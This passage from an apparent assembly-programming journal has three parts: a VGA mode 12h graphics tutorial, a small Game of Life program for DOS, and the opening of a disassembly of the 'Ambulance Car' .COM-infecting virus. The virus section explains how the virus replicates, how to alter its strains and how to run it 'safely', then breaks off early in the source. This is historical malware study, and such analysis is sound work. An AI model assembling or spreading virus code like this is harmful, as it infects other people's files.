So we need a set of damned fast Mul_80 routines. If needed you can make some
of them and at init-time find out the CPU and hardware and assign a suitable
routine and fill it in in the Window definition structures.

The "Watte01" field is just a filler. Reserved by me.

Since the Mode 012 has 16 colours to spare we should also use them. Therefore
I set up space for 4 colours: Box-, Text-, Background- and Menu-colours.
Each printing routine will make sure the right colour is set.

It will be clear that each window is very flexible to use. If the position is
wrong, just change a few numbers. Also if the colours are not optimal.
And by having several windows assigned to the same area on screen, you can
easily build special effects:

     fullscrn dw     0,  0,640,480, 0, 0, 0, 0, 4, mul_80, 0
              db    12, 14,  3, 15               ; main screen window

FullScrn just describes the complete screen. It is used for some very general
printing an plotting tasks. It starts at topleft (0,0) and is 640 wide and 480
high.

     ParWin2  dw     5, 30,630,150, 8, 9, 0, 0, 4, mul_80, 0
              db    10, 11,  3, 11               ; Parameter window

This is a window which is a subwindow of the Full Screen for storing data and
parameters.

     PlotWin  dw     5,195,630,260, 0, 0, 0, 0, 4, mul_80, 0
              db     9, 15,  3,  7               ; Virtual plotting window

This is the Virtual Plotting Window. It has some text, plus the actual
plotting window:

     PlotWin2 dw     6,196,628,256, 0, 0, 0, 0, 4, mul_80, 0
              db     9, 15,  3,  7               ; Actual plotting window

This is the place where the pixels live. It starts one pixel down/right of the
virtual window and also ends one pixel short of it.
The reason for making this "dummy" window structure was that this way there is
no need for an elaborate checking of extreme ends of the window while erasing
pixels. On the extremes of the "Virtual Plotting Window" there are the pixels
that make up a nice coloured box. It looks not nice when these lines are
erased. And the easiest way to prevent this was by defining two separate
windows: one for constructing the box and one for the actual work.

The 4 digit LED-style read-out is also controlled by four different windows.
Each digit has its own window definition:

     ------------ Digit Space ------------------------------- Start ---

     DigSpac1 dw    16, 90, 40, 50, 0, 0, 0, 0, 0, mul_80, 0
              db     9, 11, 14,  3          ; Digital display, digit 1, MSD
     DigSpac2 dw    56, 90, 40, 50, 0, 0, 0, 0, 0, mul_80, 0
              db     9, 11, 14,  3          ; Digital display, digit 2
     DigSpac3 dw    96, 90, 40, 50, 0, 0, 0, 0, 0, mul_80, 0
              db     9, 11, 12,  3          ; Digital display. digit 3
     DigSpac4 dw   136, 90, 40, 50, 0, 0, 0, 0, 0, mul_80, 0
              db     9, 11, 12,  3          ; Digital display, digit 4, LSD

     MSD = Most Significant Digit            LSD = Least Significant Digit

     ------------ Digit Space -------------------------------- End ----

This way it is convenient to allign the digits on screen. As with normal LED-
style digits, the seven segments of them are drawn piece by piece. And erased
if necessary.

As you will know from voltmeters, the MSD is the least likely to change in
time and the LSD is most likely to be different between any two samples. So in
a way it is necessary to control erasing of just one digit without massive
software overheads. Therefore I again chose to use a separate window for each
digit. It makes erasing the digit easier and independent of the other three.

Something else to observe is, that the two or three digits behind the decimal
point have another colour from those before it. This way the user can easily
see the approximate magnitude of the number without having to search for a
decimal point. This is accomplished easily by having different BckCols in the
LSD windows.

This all costs a few bytes extra, but it saves a lot of coding.


How to quickly load a segment register.
---------------------------------------
Segment registers cannot be loaded with immediate data. So you normally put a
register on the stack and use that to transfer the constant to the actual
segment register. This is not necessary. It can be done much easier like
below:

     VGA_base dw    0A000        ; for ease of loading segment registers

And the corresponding code:

     mov     es, [VGA_base]

The detour via the stack or via AX takes more cycles and bytes.


Defining what to print.
-----------------------
In a graphics screen there are an awful lot of places where to store our
text. So we need a way to define where to put which tokens. For this I use the
following construct:

     -------------- Topic ----------------------------------- Start ---
     Topic MACRO             ; start of printing message
       dw   #1, #2
       db   #3, #4
       #EM

     TopicEnd MACRO          ; topics stop here
       dw   0F000
       #EM

              Topic 180, 9, 'Start : '
     ParaStrt db    'Manual   ', 0

              Topic  9, 28, 'Power : '
     ParaPowr db    'OFF', 0

              Topic 360, 55, 'Group : '
     ParaGrup db    '16 ', 0

              TopicEnd
     -------------- Topic ------------------------------------ End ----

The Topic Macro puts the first two arguments (the new values for CurrX and
CurrY) in the first two WORD positions of the definition table. The actual
text is then put in the BYTE positions. In most cases there will be no #4
argument, but A86 doesn't care about that.

Each "to-print" table is shut down by an EndTopic Macro. It defines a new
CurrX of -4096. That clearly is out of range, so this is end of table.
In normal operation, small negative values of CurrX and CurrY are accepted and
taken care of, although it can be dangerous to use this feature.


Multiplying by 80.
------------------
On all CPU's form the 486, the MUL instruction is single cycle, so it'll be
damn fast. For all older CPU's, the following code could mean some significant
speed increases:

     -------------------- Multiply ------------------------ Start ----
     mul_80:  push  bx               ; PixAddr in Mode 012
              shl   ax, 4
              mov   bx, ax           ; bx = 16 x SCR_Y
              shl   ax, 2            ; ax = 64 x SCR_Y
              add   ax, bx           ; ax = 80 x SCR_Y
              pop   bx
              ret
     -------------------- Multiply ------------------------- End -----

This routine is used over and over again, so a few microseconds more or less
will make a big difference.


Where to leave our pixels?
--------------------------
Suppose you need to plot pixel (3,0). That's an easy one. It will fit in the
very first byte of the VGA memory array. It's segment is 0A000 and it's offset
is plain 0.
But not the full byte, since that would produce a line. No, we need to access
bit 4 of byte 0.

Yes, the first pixel is bit 7 of byte 0 and the 8th pixel is bit 0 of byte 0.
Or, in index-language, CurrX = 0 addresses bit 7, and so on.

So we need to invert the screenposition into a bitposition. We'll come to that
later. Suppose, by some sheer magic, we succeeded in making that conversion,
we still need to tell the VGA which bit is involved. That's done by means of
the following routine:

     --------------------- SetMask ------------------------ Start -------
     SetMask: push  dx               ; ah = mask
              mov   dx, 03CE
              mov   al, 8
              out   dx, ax           ; set bit mask
              pop   dx
              ret
     --------------------- SetMask ------------------------- End --------

This is an optimized routine. The VGA is a 16 bit card, so we can use 16 bit
I/O instructions for adjacent I/O ports. The construct:

              mov   al, 8
              out   dx, ax           ; set bit mask

is identical to:

              mov   al, 8
              out   dx, al
              inc   dx
              mov   al, ah
              out   dx, al

Anyway, the plottingmask is defined to be as loaded in the AH register. We can
put any value in AH, not just one pixel, but also "no pixels" and "all
pixels".


Defining colour in Mode 012.
----------------------------
Colours to use during plotting are defined in a comparable fashion:

     --------------------- Set Colour --------------------- Start -------
     SetColr: push  dx               ; ah = colour
              mov   dx, 03C4
              mov   al, 2
              out   dx, ax           ; select page register and colour
              pop   dx
              ret
     --------------------- Set Colour ---------------------- End --------

In Mode 013 you just can load a bytevalue colour into a memory location and
that's it. So that's an ultrafast resolution, but at the price of resolution.

In Mode 012 we define colour with a series of I/O instructions. If a colour
got set, it remains active until canceled by another SetColr call. Try to
remember this when all on a sudden all kinds of fancy colours start to appear
on screen....


Where to put the pixel?
-----------------------
I have presented the formula some paragrpahs before this one. Basically we
work with virtual coordinates and must translate these to real coordinates
before trying to calculate an address. This is done by:

     ------------------ VGA memory address ---------------- Start -------
     VGaddr:                         ; calculate address in VGA memory
              mov   es, [VGA_base]   ; quickly load segment register
              mov   ax, [di.CurrY]   ; ax = current Y
              add   ax, [di.Win_Y]   ; adjust for window offset
              call  [di.Multiply]    ; multiply by bytes per row
              mov   bx, [di.CurrX]   ; bx = current X
              add   bx, [di.Win_X]   ; adjust for window offset
              shr   bx, 3            ; divide by 8
              add   bx, ax           ; bx = index address into video segment
              ret
     ------------------ VGA memory address ----------------- End --------

It's all fairly straightforward.


How do we plot pixels in Mode 012?
----------------------------------
This is a silly process. We cannot access all the 4 colour planes at once, so
we have used SetColr to define which colourplanes are to be affected. This all
is rather complicated. You may either believe me on my word, or consult a 1200
page reference....

Now that we're ready to plot pixels, we do so by the following code:

     ------------------ VgaPlot -------------------- Start --------------
     VgaPlot: mov   al, [es:bx]      ;  Do the actual plotting
              mov   al, [ToPlot]
              mov   [es:bx], al
              ret
     ------------------ VgaPlot --------------------- End ---------------

The first line is a read command. It notifies the VGA controller about the
address of the pixelbyte. The resulting data from the read is of no concern.
We immediately replace it with the value of "ToPlot". For plotting there is a
value of "FF" in this byte and for erasing there is a "00" in it.

After this comes the actual plotting function. The write to the specified
address sets the pixels as defined by AL and SetMask.

Adding it all up gives the following code to really plot a pixel:

     -------- PlotPix ------------------------------- Start -----------
     PlotPix: push  ax, bx, cx, es   ; plot a point on screen
              call  VGaddr
              mov   cx, [di.CurrX]   ; calculate plottingmask
              add   cx, [di.Win_X]
              and   cx, 0111xB       ; cl = position in byte
              mov   ah, 080
              shr   ah, cl           ; now move the high bit backwards...
              call  SetMask          ; use it to set mask
              call  VgaPlot          ; and do the plotting
              pop   es, cx, bx, ax
              ret
     -------- PlotPix -------------------------------- End ------------

That's it to plot a pixel: just a few calls to some procedures we defined
earlier on. The msjority of this procedure is comprised of the way to find the
actual bit-position in the VGA memory byte. Remember, to plot pixel 0 we need
bit 7!
Therefore we load CX with the current X value, correct this for the current
window position and isolate the lower 3 bits. These indicate the position of
the pixel in screenmemory.

              mov   cx, [di.CurrX]   ; calculate plottingmask
              add   cx, [di.Win_X]
              and   cx, 0111xB       ; cl = position in byte

At this point, CL contains the n-th bit in this byte. So I load AH with the
binary pattern 10000000 and shift it right until the corresponding bit
position is reached:

              mov   ah, 080
              shr   ah, cl           ; now move the high bit backwards...

I don't know if there are batches of Intel CPU's that have a problem with the
SHR instruction is CL equals zero, but I have not yet noticed any.


Lines: series of pixels.
------------------------
There are three kinds of lines: horizontal, vertical and sloped ones. Vertical
lines are plotted pixel by pixel since all of them end up in different bytes
of VGA memory. Sloped lines are best taken care of by a Bresenham-style line
drawing algorithm (although the digital differential analyser is better).

Horizontal lines are a different kind of line. In these, several adjacent
pixels are plotted. And adjacent pixels mainly are in the same VGA memory
byte. Therefore I made two horizontal line drawers. The one for short lines
(less than 17 pixels) just plots the pixels one by one.
The other algorithm, for lines of 17 pixels or more, tries to fill VGA memory
with as much byte writes as possible.


Taking care of longer horizontal lines.
---------------------------------------
Suppose our line is composed as follows:

     First       1       2      3 ... K    Last    ; byte in video memory
    ......## ######## ######## ###...### ###.....  ; # = pixel to be set

So our line starts at pixel 6 (i.e. bit 1) of VGA memory byte "First". Next it
lasts for N pixels and the last pixel to plot is pixel 2 (or bit 5).
We need some variables to calculate how to proceed with this in the shortest
possible time. This needs some calculations, so for short lines the math
overhead is more work than the actual plotting will take up.

     First       1       2      3 ... K    Last    ; byte in video memory
    ......## ######## ######## ###...### ###.....  ; # = pixel to be set

We first need to know the E-value which describes the number of pixels to plot
in the very first byte. The E-value is calculated as follows:

     E-val = 8 - ((CurrX + Win_X) AND 7)

Now we know the number of pixels to plot in the very first VGA memory
location. It would however come in handy if we would know with which plotting
mask this would correspond. That's why we use it to derive the E-mask:

    E-mask = FF shr ((8 - E-val) AND 7)

Next we need to know how many pixels there need to be plotted in the last
memory location. L-value and L-mask are determined as follows:

     L-val = (Total - E-val) AND 7
    L-mask = 080 sar L-val

With the SAR we shift signbits to the right until the number of pixels
corresponds with the number of bits in the mask.

The last parameter we need to know is the actual speeding-up part: the full
bytes that can be plotted. The octet-part of the routine. We do this as
follows:

     K-val = (T - E-val - L-val)/8

Now it also becomes clear why I kept the E-val and L-val parameters. They're
just needed for getting the right value for K-val.

There is, however one exceptional situation. Suppose the line we need to plot
is 26 pixels long, starting at pixel 6. This would produce the values:

   E-val = 2                                     E-mask = 00000011
   L-val = (26 - 2) AND 7 = 24 AND 7 = 0         L-mask = 00000000
   K-val = (26 - 2 - 0)/8 = 3

So, if the line ends on a byte boundary, we may NOT try to plot <A LOT> of
pixels past it (in a plotting loop that starts with CX = 0).

What the H_line procedure does is no more than what I decribed above. Here
comes the source:

     -------- H_Line -------------------------------- Start -----------
     L0:      mov   cx, [di.DeltaX]      ; do a short line
     L1:      call  PlotPix              ; by just repeating a single pixel-
              inc   [di.CurrX]           ; plot and update of CurrX
              loop  L1                   ; until done
              pop   es, cx, bx, ax
              ret

     H_Line:  push  ax, bx, cx, es       ; optimized horizontal line drawing
              cmp   [di.DeltaX], 17      ; too few pixels for a bulk draw?
              jb    L0
              mov   cx, [di.CurrX]       ; do a long line
              add   cx, [di.Win_X]       ; first get the E-value as described
              and   cx, 0111xB           ;   above
              mov   bx, 8
              sub   bx, cx
              mov   [E_val], bx          ; pixels to plot in leftmost byte
              mov   al, 0FF              ; now compose the mask to use there
              shr   al, cl
              mov   [E_mask], al         ; and store it in memory
              mov   cx, [di.DeltaX]      ; CX = length of line
              sub   cx, [E_val]          ; compensate for first-byte pixels
              mov   ax, cx
              and   ax, 0111xB           ; this many pixels in rigthmost byte
              mov   [L_val], ax          ; and store it in memory
              sub   cx, ax               ; CX = number of pixels inbetween
              shr   cx, 3                ; divide by 8 pixels per byte
              mov   [K_val], cx          ; number of "full" bytes to plot
              clr   al                   ; AL := 0
              mov   cx, [L_val]          ; prepare to compose L-mask
              cmp   cx, 0                ; any bits in "last byte"
              IF ne mov  al, bit 7       ; if any bits, setup AH register
              dec   cx                   ; compensate for pixel 0, ...
              sar   al, cl               ; ... compose plotting mask and ...
              mov   [L_mask], al         ; ... store it into memory.
                                         ; that's it. Let's plot!
              call  VGaddr               ; load BX with address of byte in
                                         ; VGA memory
              mov   ah, [E_mask]
              call  SetMask              ; set plotting mask and ...
              call  VgaPlot              ; ... plot leftmost part
              inc   bx                   ; get adjacent address
              mov   cx, [K_val]          ; prepare for bulk-filling
              jcxz  >L4                  ; if nothing to do, jump out
              mov   ah, 0FF              ; else set ALL PIXELS mask
              call  SetMask
     L3:      call  VgaPlot              ; plot middle part
              inc   bx
              loop  L3                   ; until done
     L4:      mov   ah, [L_mask]
              call  SetMask
              call  VgaPlot              ; plot remaining pixels
              mov   ax, [di.DeltaX]
              add   [di.CurrX], ax       ; make sure CurrX is updated
              pop   es, cx, bx, ax       ; and git outa'here
              ret
     -------- H_Line --------------------------------- End ------------

The preparations are the bulk of the work, but after that is done, the line is
plotted with the lowest amount of I/O overhead.


Vertical lines.
---------------
Vertical lines are simply plot by repeatedly calling PlotPix. It's so simple
that neither need nor want to elaborate on it:

     -------- VertLin ------------------------------- Start -----------
     VertLin: push  cx                   ; draw a vertical line
              mov   cx, [di.DeltaY]
     L0:      call  PlotPix
              inc   [di.CurrY]           ; adjust Y coordinate
              loop  L0                   ; but not X value!
              pop   cx
              ret
     -------- VertLin -------------------------------- End ------------


What to do with linedrawing functions?
--------------------------------------
Now that we can draw lines, we can also draw boxes and window borders. This
all looks very professional and the overview of a program is enhanced
considerably. Try to figure out how to make the box-drawers by yourself.


Plotting text.
--------------
Now that we have windows that can be put at any plotting position, we also
need to be able to position text at any position. It doesn't look nice if
different windows force text to default to byte boundaries. And with the
experience we got from the H_line function, we are able to make a character
plotter that puts text on screen at ANY position.

I use a 9 x 16 character set. The nineth bit is just always blank, but it
enhances readability considerably. The pixels in the bitmap are all 8 bits
wide and 16 pixels tall.

In exceptional cases, the bitmaps can be plotted at byte boundaries. In 85+ %
of the time this will not be the case. Therefore I do the following:

  - do some positioning math first
  - repeat 16 times:
    - load the byte of the bitmap in AH
    - shift AX to the right the correct number of pixels
    - plot the AH part
  - if plotting on a byte boundary, we're done, else
    - repeat 16 times:
      - load the byte of the bitmap in AH
      - shift AX to the right the correct number of pixels
      - plot the AL part

Let's just have a look:

     -------- PutChar ------------------------------- Start -----------
     L0:      add   [di.CurrY], 16       ; process 'LF'
     L1:      pop   es, si, cx, bx
              ret

     L2:      mov   bx, [di.Indent]      ; process 'CR'
              mov   [di.CurrX], bx
              jmp   L1

     PutChar: push  bx, cx, si, es       ; print char in al at (x,y)
              cmp   al, lf
              je    L0
              cmp   al, cr
              je    L2

              mov   bx, [di.CurrX]
              add   bx, CHR_WID
              cmp   bx, [di.Win_wid]     ; still safe to print character?
              jbe   >L3                  ; if so, skip over this part
              mov   bx, [di.Indent]
              mov   [di.CurrX], bx       ; mimick 'CR'
              add   [di.CurrY], 16       ; mimick 'LF'

     L3:      mov   cx, [di.CurrX]
              add   cx, [di.Win_X]
              and   cx, 0111xB
              mov   [C_val], cl          ; store shiftcount for masks
              mov   bx, 0FF00
              shr   bx, cl               ; setup plotting mask and ...
              mov   [P_mask], bx         ;     ... store it
              clr   ah                   ; ax = ASCII code
              mov   si, ax               ; make address of pixels in bitmap
              shl   si, 4
              add   si, offset bitmap
              call  VGaddr               ; bx = -> in video memory
              mov   ax, [P_mask]         ; only the AH part is used ...
              call  SetMask              ; ... here.
              mov   cx, 16               ; 16 pixel lines per token
     L4:      push  cx                   ; we're in the loop now
              mov   ah, [si]             ; AH = pixelpattern
              clr   al                   ; AL = empty
              mov   cl, [C_val]          ; get shiftcount
              shr   ax, cl               ; distribute pixelBYTE across a WORD
              mov   cl, [es:bx]          ; dummy read, CL is expendable
              mov   [es:bx], ah          ; actual plotting of this half
              add   bx, 80               ; point to next pixelbyte address
              inc   si                   ; next pixeldata address
              pop   cx
              loop  L4                   ; and loop back

              sub   bx, 16 * 80 - 1      ; back to original position
              mov   ax, [P_mask]
              cmp   al, 0                ; if nothing to do, ...
              je    >L6                  ; ... skip this chapter
              mov   ah, al               ; else repeat the lot for the right-
              call  SetMask              ; most pixels....
              mov   cx, 16
              sub   si, cx               ; correct SI
     L5:      push  cx
              mov   ah, [si]
              clr   al
              mov   cl, [C_val]
              shr   ax, cl
              mov   cl, [es:bx]
              mov   [es:bx], al
              add   bx, 80
              inc   si
              pop   cx
              loop  L5
     L6:      add   [di.CurrX], CHR_WID  ; adjust CurrX value before ...
              jmp   L1                   ; ... getting a hike
     -------- PutChar -------------------------------- End ------------

So far for plotting text. This routine will dump any character in any place of
the graphics screen. But it needs a CurrX and a CurrY value to know where to
plot things. This is both an advantage and a disadvantage. The advantage is
that we can plot ANYWHERE we like. The disadvantage is that we need to
elaborately specify CurrX and CurrY before the text is where we would like to
have it.

That's why I made the constrcut with the Topic and TopicEnd macro's, as
described above.

Here comes the code for printing a table on screen. We spent a lot of time on
the preparations, and this is the stage where it is going to pay off. Look how
much code we need for printing neat sets of tokens and characters on screen.

     -------- Print --------------------------------- Start -----------
     print:   mov   ah, [di.TxtCol]      ; print a table of text
              call  SetColr
     L0:      lodsw                      ; get Xpos
              cmp   ax, 0F000            ; end of table?
              je    ret                  ; exit, if so
              mov   [di.CurrX], ax
              lodsw                      ; get Ypos
              mov   [di.CurrY], ax
     L1:      lodsb                      ; get text
              cmp   al, 0
              je    L0
              call  putchar              ; and print it
              jmp   L1                   ; until this line is done
     -------- Print ---------------------------------- End ------------

Wit this approach, and starting from a working (empty) framework of routines,
you can design the userinterface of your software within the hour. And it will
look just fine.
The actual code is then the only thing you need to worry about.....

Having such routines, which have been tested and found reliable, you make the
user interface easily and are able to concentrate on the actual coding the
maximum amount of time. If the screen needs another layout (since you couldn't
realize the function you considered), just change a few entries in the table.
Many times just the X or Y values need some adjustment for better lining up,
or for regrouping. No need to worry about the order of the plotting. Just make
sure that the correct window is selected (for the colours) and that the table
is terminated by a TopicEnd.


Conclusion.
-----------
So far my elaboration on the VGA mode 12h. Again, I would rather use 800 x 600
but that mode is not standardised. VGA 12h is standard on all VGA cards, so
it's the best we can universally get and for many applications it is more than
enough.

Please try to make the BoxDrawing function. I will submit the "solution" to
the next issue. For future issues I will start working on an explanation about
mouse-usage. This little rodent is nice to control many applications. If the
screen is well layed out, you don't need the keyboard for data entry. Just drag
the mouse along the screen and poke him in the eye.


The bitmap data for the character generator can be obtained from
           http://asmjournal.freeservers.com/supplements/univ-vmode.html
where the complete text of the article has been archived.



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
																			  Conway's Game of Life
																			  by Laura Fairhead


     I had the idea for this one day after stumbling upon a "gem" that
somebody had written to play life. It was small and fast and reminded
me of years ago when I had written many versions of this for the
BBC Master 128 (my love lost). Since I had never written a version
for the PC I thought that I would, and ended up spending some hours
trimming off the bytes until it is now :- 156 bytes long. I must admit
if it was not for the program that I found, this program would have been
MUCH slower than it is. After I had written the code I tested it against
the program that I had found and to my perplexity it was a great deal
slower. After some hours of frustration I found the reason:- my program
was accessing the video memory to do the bulk of its work. This must have
brought about a factor of 12 decrease in speed!!

     Life is a classic game of cellular automata by John Conway. It is
played on an nxn grid of squares. Each square may be occuppied by a
cell or empty. Each 'go' of the game the player calculates the next
generation of a colony of cells by applying three simple rules:-

(i)     a cell with less than 2 or more than 3 neighbours dies
(ii)    a cell with 2 or 3 neighbours survives
(iii)   a cell is born in a square with exactly 3 neighbours

     A neighbouring square is one diagonally adjacent as well as the
normal horizontal/vertical so each square has 8 neighbouring squares.


Overview of the code
~~~~~~~~~~~~~~~~~~~~

First, note that if we define

         S:=state of square in this generation (0=empty, 1=occupied)
         N:=number of neighbours
        S':=state of square in the next generation

then according to the rules

         S'={0, if N<2 or N>3
            {1, if (N=2 or N=3) and S=1
            {1, if N=3

so S'=1 iff (N=2 and S=1) or N=3

this can be simplified using bitwise-OR to the dramatically simple:

             S'= ( N|S=3 )

note: iff means "if and only if"

       "A iff B" means that A => B and B => A


     The code uses one big array with one byte for each square that
starts just after the program end. To save space it just assumes that it
can use this memory since this is generally okay. However this is
very bad practice really and it should use AH=04Ah/int 021h to adjust
the memory size and abort if not successful.

     The big array actually serves the purpose of 2 arrays; bit0 of
a byte indicates the state of the square in the current generation. bit4
of each byte indicates the state of the square in the next generation.

     After initialisation, generation 0 is calculated by filling about
1/4 of the array with 1's.

     Now we do a loop to get the next generation. The screen is 0140h
bytes across and 0C8h bytes down. Therefore:-

     -0141h -0140h -013Fh

     -0001h    .   +0001h

     +013Fh +0140h +0141h

     If DI is the offset of the array which we are calculating for,
note that the neighbours can be summed as follows:-

     MOV AX,[DI-0141h]
     ADD AL,[DI-013Fh]
     ADD AX,[DI+013Fh]
     ADD AL,[DI+0141h]
     ADD AL,[DI-1]
     ADD AL,[DI+1]
     ADD AL,AH

     Note that if bit4 of any of the neighbours was set then we would
still have the correct total in the least significant 4 bits of AL.

     So from here the new cell state can be calculated simply:-

     OR AL,[DI]
     AND AL,0Fh

     CMP AL,3

     And if ZF=1 now we have a set cell.

     JNZ ko
     OR BYTE PTR [DI],010h
ko:


     When the next generation has been calculated we have done most of
the work. The only thing is that if we want to iterate we need all
of those bit4 's moved to bit0, also we want to display the next
generation, this can be done easily at the same time.

     Note that due to the structure of the code generation#0 is never
displayed. Also we always have blue cells. Despite this it is quite
an entertaining little program to watch....


     The source here is in MASM format but should be trivial to convert
to run on any assembler. It is assembled into a .COM file which means
you should use the /T option on the linker (T=tiny).


===========START OF CODE===================================================

OPTION SEGMENT:USE16
.386

cseg SEGMENT BYTE

ASSUME NOTHING
ORG 0100h

kode PROC NEAR

;
;mode 013h=320x200x256 (0140hx0C8h) and be kind with the stack
;
         MOV SP,0100h

         MOV AX,013h
         INT 010h

;
;use current time as random number seed
;in BP,DX which is used later
;
         MOV AH,02Ch
         INT 021h
         MOV BP,CX
;
;get seg address of 1st seg after code for array store start
;for now ES points there and DS=screen
;
         MOV AX,DS
         ADD AX,01Ah             ;(OFFSET endofprog+0Fh>>4)=(1A)
         MOV ES,AX
         MOV AX,0A000h
         MOV DS,AX

;
;CREATE GENERATION#0
;  this is done by filling approx 1/4 of the cells in the array
;  'randomly', while taking care not to fill any edge cells
;

;
;blank the array
;  this is done to ensure the edge cells are clear
;
         XOR DI,DI
         MOV CX,0FA00h
         REP STOSB

;
;fill the array
;  two nested loops, CL counts the rows, SI counts the columns
;  this is so that after each row DI can be bumped past the edge
;
         MOV CL,0C6h
         MOV DI,0141h            ;array offset we are addressing
;
;BX is 0141h from now until exit, it is used as a constant later
;
         MOV BX,DI

lopr0:  MOV SI,-013Eh

;
;iterate random number seed in BP,DX
;
lopr:   LEA AX,[BP+DI]
         ROR BP,3
         XOR BP,DX
         SUB DX,AX
;
;set cell with probability 1/4
;
         CMP AL,0C0h
         SBB AL,AL
         INC AX
         STOSB
;
;
         INC SI
         JNZ lopr

         SCASW                   ;DI+=2, skipping edge

         LOOP lopr0

;
;now we set DS=array, ES=screen. this doesn't change until exit
;
         PUSH ES
         PUSH DS
         POP ES
         POP DS                  ;DS=vseg,ES=0A000h throughout

;
;'mlop' is the main loop, outputting generations until the user terminates
;
mlop:
;
;CREATE NEXT GENERATION
;
         MOV DI,BX               ;DI=0141h

;
;'lopy' is the loop for rows, a count is not needed because we can get
;the stop point from testing the array offset DI
;

lopy:   MOV SI,013Eh

;
;'lopx' is the loop for columns, SI holds the count
;

;
;get the total number of neighbours into the least significant 4 bits of AL
;
lopx:   MOV AX,[DI-0141h]
         ADD AL,[DI-013Fh]
         ADD AX,[DI+BX-2]
         ADD AL,[DI+BX]
         ADD AL,[DI-1]
         ADD AL,[DI+1]
         ADD AL,AH
;
;calculate new cell state
;
         OR AL,[DI]
         AND AL,0Fh
         CMP AL,3
         JNZ SHORT ko
         OR BYTE PTR [DI],010h

ko:     INC DI

         DEC SI
         JNZ lopx

;
;(each row we miss 2 edge cells)
;
         SCASW
         CMP DI,0FA00h-013Fh
         JC lopy

;
;FIXUP ARRAY AND DISPLAY
; bit4 is copied to bit0 in each byte. all other bits then cleared so
; cells appear as blue pixels, also the iteration loop above assumes
; that bit4 is clear on entry (it only sets it)
;
         MOV CX,03E80h
         XOR DI,DI

lopc:   LODSD
         SHR EAX,4
         AND EAX,01010101h
         MOV [SI-4],EAX
         STOSD
         LOOP lopc

;
;USER KEYPRESS?
;
         MOV AH,0Bh
         INT 021h
         ADD AL,3
;
;no, back for next generation
;
         JP mlop
;
;yes, AL=2 now so make AX=2 to go into text mode
;
         CBW
         INT 010h
;
;back to DOS
;
         MOV AH,04Ch
         INT 021h

kode ENDP

endof EQU $

cseg ENDS

END FAR PTR kode


===========END OF CODE=====================================================


     While the code is optimised for size and for speed you may find that
it runs too quickly. This can be easily remidied by the addition of a wait
for vertical synchronisation loop (or vert sync as we techies call it).

     Just add the following after the generation calculating code (that
is after the instruction 'JC lopy'):-

         MOV DX,03DAh

lopv0:  IN AL,DX
         AND AL,8
         JNZ lopv0

lopv1:  IN AL,DX
         AND AL,8
         JZ lopv1

     Also if you add this the program size has changed. 'endofprog' is now
01ABh, so the number of segments to add to DS to get the start of free space
is now 01Bh. You must change the instruction at the beginning of the code:-

         MOV AX,DS
**      ADD AX,01Bh             ;(OFFSET endofprog+0Fh>>4)=(1B) **
         MOV ES,AX


     One final note: I use SCASW in this code to increment DI by two.
This is a well known space saving trick. However you must be wary since
it does not do just that; it reads the memory at ES:[DI]. Generally this
is fine but if DI=0FFFFh we will get a general protection fault.



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                     'Ambulance Car' Disassembly
                                                     by Chili


This virus  has definitely  my  favourite  payload of  all times.  I just  love
seeing that little  ambulance run  across the screen with  a 'siren' playing at
the same time.  Other than that, the virus itself isn't much of a thing.  Don't
forget though, that it is dated back to at least 1990.

It is a non-resident  .COM infector,  and each time an  infected file is run it
will attempt to  infect  two files  (be it  in the  current  directory  or in a
directory  located in  the PATH)  in a parasitic  manner.  Infected files  will
experience a 796 bytes growth, being the main virus body appended to the end of
the host. Also the host file's date and time will be preserved.  On ocasion the
virus will display the 'ambulance car' payload.

The  virus doesn't  preserve the initial  contents of  AX and so  programs like
HotDIR fail to run when infected.  Also if there is any  reference to 'PATH' in
the environment block before  the actual PATH string the virus will assume that
to be the actual PATH (i.e. 'CLASSPATH=...').


Playing it safe
---------------
At the DOS prompt type "PATH ;" so that the virus will only infect files in the
current directory and you can keep track of things.  Also if all you want to do
is see the payload,  then comment the following lines in the source code (right
after the delta offset calculation) so that no files are infected:

                 call    search_n_infect
                 call    search_n_infect

Moreover you should comment the lines presented below (for the 'RedXAny' strain
look-alike) so that the payload is shown everytime the virus is run.

In case  things start to  get out of hand,  you should do  one of three things:
either disinfect the files yourself with an hex editor,  use the latest version
of F-PROT  (available from ftp.complex.is or through Simtel and Garbo)  to scan
and clean the infected files or use my own disinfector  (in another article) to
clean this specific strain.

[NOTE: F-PROT  will  report  the  strain  whose  source  code is  presented  as
        Ambulance.796.D]

Keep in mind that  this virus is not destructive,  so feel free to go ahead and
infect your entire computer (you really shouldn't do this,  since accidents can
sometimes happen!).


Strains
-------
A  'RedXAny'  strain look-alike  can be  obatined  by commenting  the following
lines (both in the 'payload' procedure):

                 jne     exit_payload            ;  (starting  with  the  sixth)

                 jnz     exit_payload            ;  don't show payload

[NOTE: This will not give you the actual 'RedXAny' strain, but one that behaves
        in the same manner - always shows the ambulance car]

Other strains exist,  but will not be  discussed here,  has nothing of interest
would be added.


Compatibility
-------------
The virus runs ok in a Win95's DOS box.  Also, remember that for the payload to
be apreciated in full, a PC Speaker is required.  Bad luck for those of you who
don't have a computer with one...


Here is the disassembly:

--8<---------------------------------------------------------------------------

; Ambulance Car (aka Ambulance, RedX, Red Cross)
; Ambulance-B strain (or so it seems!)
; Disassembly by Chili for APJ #6
; Byte for byte match when assembled with TASM 4.1
; Assemble with:
;       tasm /ml /m2 ambul-b.asm
;       tlink /t ambul-b.obj


PSP_environment_seg     equ     2Ch     ; PSP location of process'  environment
                                         ;  block segment address

BDA_addr                equ     40h     ; BDA (Bios Data Area) segment address

BDA_LPT3_port_addr      equ     0Ch     ; BDA  location of  LPT3 I/O port  base
                                         ;  address
BDA_video_mode          equ     49h     ; BDA location of current video mode
BDA_timer_counter       equ     6Ch     ; BDA location of number of timer ticks
                                         ;  (18.2 per second) since midnight


_TEXT           segment word public 'code'
                 assume  cs:_TEXT, ds:_TEXT, es:_TEXT, ss:_TEXT

                 org     100h

; Host and virus' main body
;--------------------------
ambulance_car   proc    far

; Jump over host to real beginning of virus

                 db      0E9h, 01h, 00h  ; Harcoded relative near jump

; Host (missing the first 3 bytes)
;
; Dummy host is just 4 bytes so only a 'nop' here

host:
                 nop

; Calculate the delta offset
;
; This piece of code  will 'fool' some disassemblers and so it will  appear as:
;
;       call    $+4
;       add     [bp-7Fh], bx
